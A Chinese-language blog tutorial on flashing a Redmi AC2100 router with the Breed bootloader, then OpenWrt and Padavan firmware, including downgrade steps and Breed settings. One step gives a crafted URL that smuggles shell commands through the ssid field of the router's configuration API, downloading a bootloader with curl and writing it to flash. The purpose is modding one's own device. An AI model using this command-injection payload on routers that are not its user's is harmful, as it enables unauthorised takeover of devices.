红米AC2100刷入openwrt/以及其他第三方系统教程
提示:本博客图床为GitHub,若无法查看图片,请用代理访问
准备工作:
- 红米ac2100路由器
- 刷机包
- 基础的电脑操作
刷机包:
百度网盘:红米AC2100刷机包.zip链接:https://pan.baidu.com/s/1iZRf8IRO-mTWIiZDWEIxIg?pwd=8neh 提取码:8neh
警告:刷机有风险,后果自负
刷入breed不死后台
降级
- 进入路由器后台管理页面(小米路由器通常是192.168.31.1)
- 登录后检查固件版本高于2.0.7的必须降级,降级包在上面的刷机包里面
- 选择下好的降级包
- 注意此操作将清空你的所有配置,刷机前请先备份
- 等待几分钟,等待路由器的指示灯由黄变蓝,就代表降级成功,请将路由器的lan口插入到电脑上,重新访问192.168.31.1。
- 简单的设置后,重新进入192.168.31.1,检查当前系统版本
注入漏洞刷入breed
- 系统版本成功降级后,观察浏览器地址栏里的stok,他是路由器唯一标识符,每次重启都会刷新,仅当前有效。
- 此时需要将路由器连接光猫(需要让路由器联网),因为breed需要下载
- 将stok=后面的id复制下来备用,将其替换至下面链接后的stok=后面的xxxxxxxx
http://192.168.32.1/cgi-bin/luci/;stok=<stok>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=%0Acd%20%2Ftmp%0Acurl%20-o%20B%20-O%20https%3A%2F%2Fbreed.hackpascal.net%2Fr1286%2520%255b2020-10-09%255d%2Fbreed-mt7621-xiaomi-r3g.bin%20-k%20-g%0A%5B%20-z%20%22%24(sha256sum%20B%20%7C%20grep%20242d42eb5f5aaa67ddc9c1baf1acdf58d289e3f792adfdd77b589b9dc71eff85)%22%20%5D%20%7C%7C%20mtd%20-r%20write%20B%20Bootloader%0A
- 替换完之后复制这个链接到浏览器
-
看到图中
{code:0}表示成功,路由器将在60秒内重启(指示灯由蓝变黄,再变回蓝色,如果网速够快的话,这应该是一秒钟的时间),如果之前再wan口插了网线,那么此时应该是断网状态,代表刷breed成功 -
如果没成功可以重复上面的操作(替换stok的id)
-
刷写成功后拔掉电源,用牙签顶住电源旁边的小孔里的按钮,顶住的同时接上电源(大概5-10),就能进入breed,地址为:192.168.1.1(如果进入的是光猫后台,就把wan口的网线拔掉),此时路由器的指示灯蓝灯闪烁
修改breed环境变量
- 进入breed,环境变量编辑,新增字段
xiaomi.r3g.bootfw值为2,然后点保存。
刷入OpenWrt
- 刷入镜像
镜像介绍:
| initramfs-kernel.bin文件 | initramfs是放在内存RAM中的rootfs 映像文件(底包文件) |
|---|---|
| squashfs-sysupgrade.bin文件 | openwrt的系统固件 |
| squashfs-rootfs0.bin文件 | openwrt跟文件系统的单独映像 |
| squashfs-kernel1.bin文件 | 内核文件 |
- 一般我们只用系统文件和底包文件就行了,由于底包是运行在内存中的,断电就会清除,我们需要先安装底包让路由器适配,然后再从底包的系统升级处升级系统固件。
- 等待进度条跑完
- 等待刷入······
- 刷入的这个是官网的底包,默认地址192.168.1.1,没有密码,直接点登录就行
- 底包刷完了我们来刷固件,进入systemctl菜单,找到图片所处位置
- 等待刷机中······
- 刷机完成
从openwrt转到老毛子(radavan)系统
- 由于128M内存是在太小,本来是想用来当旁路由的,奈何刷完系统内存就占了90M,是在无法运行小猫咪,索性给他刷成padavan,提升一下2.4g带宽,也可以供智能家居使用
教程开始
- 进入breed页面,重复刷openwrt的步骤
- 如果刷机后无法进入后台,将小米RG设置中的,
normal_firmware_md5备份并删除,再点击下面的保存,重新刷入系统即可。
- 成功进入后台,用户名密码都是admin
- 固件介绍:无线2.4g能跑满百兆,适合长期使用
